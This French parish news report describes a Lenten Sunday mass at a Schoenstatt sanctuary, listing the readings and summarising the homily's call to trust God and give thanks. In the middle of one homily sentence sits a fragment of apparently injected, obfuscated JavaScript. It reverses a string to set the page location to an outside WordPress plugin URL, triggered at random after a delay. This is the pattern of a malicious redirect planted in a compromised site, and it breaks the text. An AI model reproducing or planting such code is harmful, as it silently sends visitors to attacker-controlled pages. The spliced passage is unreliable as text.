La célébration eucharistique du premier Dimanche de Carême, ce 06 mars 2022, a été présidée par l’Abbé Chadrack NDUWAYO, Directeur de l’internat au Petit Séminaire de Kanyosha, en concélébration avec le Père Léonce NTAKARUTIMANA, Maître des novices, au Sanctuaire Marial de Schoenstatt de Mont Sion Gikungu. Cette messe a été animée par la Chorale Sancta Mariaet a débuté à 10h00. Pour ce qui est de la liturgie de la Parole, la première lecture a été tirée du livre du Deutéronome (Dt 26, 4-10) ; le Psaume responsorial était (Ps 90 (91), 1-2, 10-11, 12-13, 14-15ab) ; la deuxième lecture de la lettre de saint Paul Apôtre aux Romains (Rm 10, 8-13) et enfin l’Évangile selon Saint Luc (Lc 4, 1-13).

Après avoir accueilli les fidèles, le célébrant leur a résumé les différentes lectures du jour. Quelqu’un qui se tient sous l’abri de Dieu rien ne lui manque ou ne l’effraie. Mes chers frères et sœurs optons toujours le Seigneur comme notre refuge et notre rempart, a-t-il conclu son introduction.

Il a commencé l’homélie en invoquant le Saint Esprit par l’un des chants lui désdiés. Chers fidèles, toutes les lectures d’aujourd’hui nous invitent à placer notre confiance et notre croyance en Dieu. Nous sommes appelés à croire que notre Dieu est réellement le Tout-Puissant et à manifester devant tout le monde que ce Dieu vit réellement en nous.

Je ne sais pas s’il vous est déjà arrivé de passer par une période sombre de la vie où vous vous posez mille et une questions du pourquoi de tous les problèmes que vous rencontrez, pourquoi c’est vous la victime, c’est sur vous que se déchaînent tous les malheurs du monde. Pourquoi les mésententes non moins sérieuses entre vous et votre conjoint alors que vous vous êtes promis de tout partager et de se supporter, des enfants qui, peut-être vous avez prié longuement et jeûné pour les avoir, deviennent source de votre mine renfrognée, une épouse que tu comparais dans le temps à un ange et qui pour le moment tu vois en elle le diable en personne, … Quand vous vous comparez aux autres vous vous voyez toujours dans des sales draps et que les autres se la coulent toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douces.

Après vous prenez la bonne décision de se tourner vers le Seigneur et vous implorez son intervention afin qu’Il calme ce vent dans votre vie. Une fois le vent calmé, vous arrivent-ils de prendre le temps de voir qui est intervenu pour tout mettre en ordre ? Vous arrivent-ils d’analyser cette vie nouvelle par rapport à l’ancienne tout en cherchant à discerner qui est derrière ce changement afin de prendre une résolution de ne plus vivre comme avant ? Pourquoi je vous dis ça ? C’est la première lecture qui me pousse à vous le dire. Nous voyons Moïse qui rappelle au peuple juif son passé et ce que le Seigneur a fait pour eux. Souvent, chers frères et sœurs, Dieu intervienne en notre faveur, opère des miracles dans nos familles restreintes comme élargies, dans notre entourage, dans nos milieux de travail, …. Et cela passe inaperçu comme si de rien n’était. Nous ne prenons pas le temps de venir lui dire merci. Si nous analysons bien ces réalisations, ce n’est pas parce que nous sommes dignes et pieux qu’il les fait.  Rien ne l’obligeait à les accomplir pour nous. Dieu pouvait même les accomplir pour quelqu’un d’autre. Nous restons indifférents comme si de rien n’était. Comme leçon, apprenons toujours à se souvenir où Dieu nous a tiré, a tiré les nôtres et ainsi lui remercier sans cesse et surtout pendant cette période de Carême prenons cette ferme décision, a conclu son homélie.